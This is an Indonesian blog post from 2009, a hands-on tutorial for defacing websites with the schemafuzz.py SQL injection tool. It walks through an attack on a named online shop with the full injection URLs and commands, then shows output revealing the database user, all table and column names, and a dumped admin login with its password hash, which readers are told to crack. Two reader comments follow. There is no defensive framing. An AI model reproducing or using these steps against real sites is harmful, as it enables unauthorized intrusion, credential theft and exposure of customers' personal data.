Thursday, May 21, 2009

Deface Web Menggunakan Schemafuzz.py

| Thursday, May 21, 2009 | 2 comments
Bahan-bahan yg harus disiapkan :
1.Python
2.Schemafuzzz.py
3.CMD

Gunakan CMD , masuk ke folder schemafuzz.py
Dengan perintah >> schemafuzz.py -u "target" --perintah

Utk lebih jelasnya,,langsung ke TKP ,, wkwkwkwk

1.Cari target ,, ini target kita >>>
http://www.sleeppost.com/viewproduct.php?pid=923

2.Cek columnnya
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" --findcol

maka akan keluar :


+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
+] Evasion Used: "+" "--"
+] 09:44:10
-] Proxy Not Given
+] Attempting To find the number of columns...
+] Testing: 0,1,2,3,4,5,6,
+] Column Length is: 7
+] Found null column at column #: 0
+] SQLi URL: http://www.sleeppost.com/viewproduct.ph … +UNION+SEL
CT+0,1,2,3,4,5,6--
+] darkc0de URL: http://www.sleeppost.com/viewproduct.ph … +1=2+UNION
SELECT+darkc0de,1,2,3,4,5,6
-] Done!


Nah kita gunakan ini http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6
utk nginject.


3.Cari db nya
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dbs



[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] ??sleeppo_store?

[-] 09:57:00
[-] Total URL Requests 3
[-] Done


Tuh kan keliatan db nya,,wkwkwkkw sleeppo_store


4.Cari nama tabel dalam db
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store



[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20

[Database]: sleeppo_store
[Table: Columns]

[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi
n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead
er,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai
l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate
,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,s
urvey,qty

[-] 10:24:51
[-] Total URL Requests 139
[-] Done


Berarti itu site punya 20 tabel,kolomnya juga ada tuh.Tinggal pilih yg mana yg mau di exploit :p


5.Exploit tabel n kolom
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword



[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3

[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data

[-] 10:37:36
[-] Total URL Requests 5
[-] Done


xixixi...itu user ama passnya udah kliatan,,passnya tgl di decrypt aje wink

Cara diatas berlaku untuk sql versi 5 , utk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom

ex : schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --fuzz


Beberapa perintah :
--fuzz >>> mencari nama kolom n tabel pada sql v 4
--schema >>> melihat nama tabel
--dump >>> melihat isi kolom
--findcol >>> menemukan dakc0de ( colom )

Silahkan cari yg laen.Baca aja help nya

link :
Python
Schemafuzz.py

Related Post:

2 comments:

Anonymous said...

ya bisa aja lah dijebol..tuh web khan bikinan lo..! gw juga bisa unjuk gigi macem tuh.!
by hexa

Melvin Hendrik Tambunan said...

Thx agan atas tutorialnya....akan saya coba pelajari lagi biar pintar seperti agan...

:)) ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} :)] ~x( :-t b-( :-L x( =))

Post a Comment

 
© Copyright 2010. yourblogname.com . All rights reserved | yourblogname.com is proudly powered by Blogger.com | Template by o-om.com - zoomtemplate.com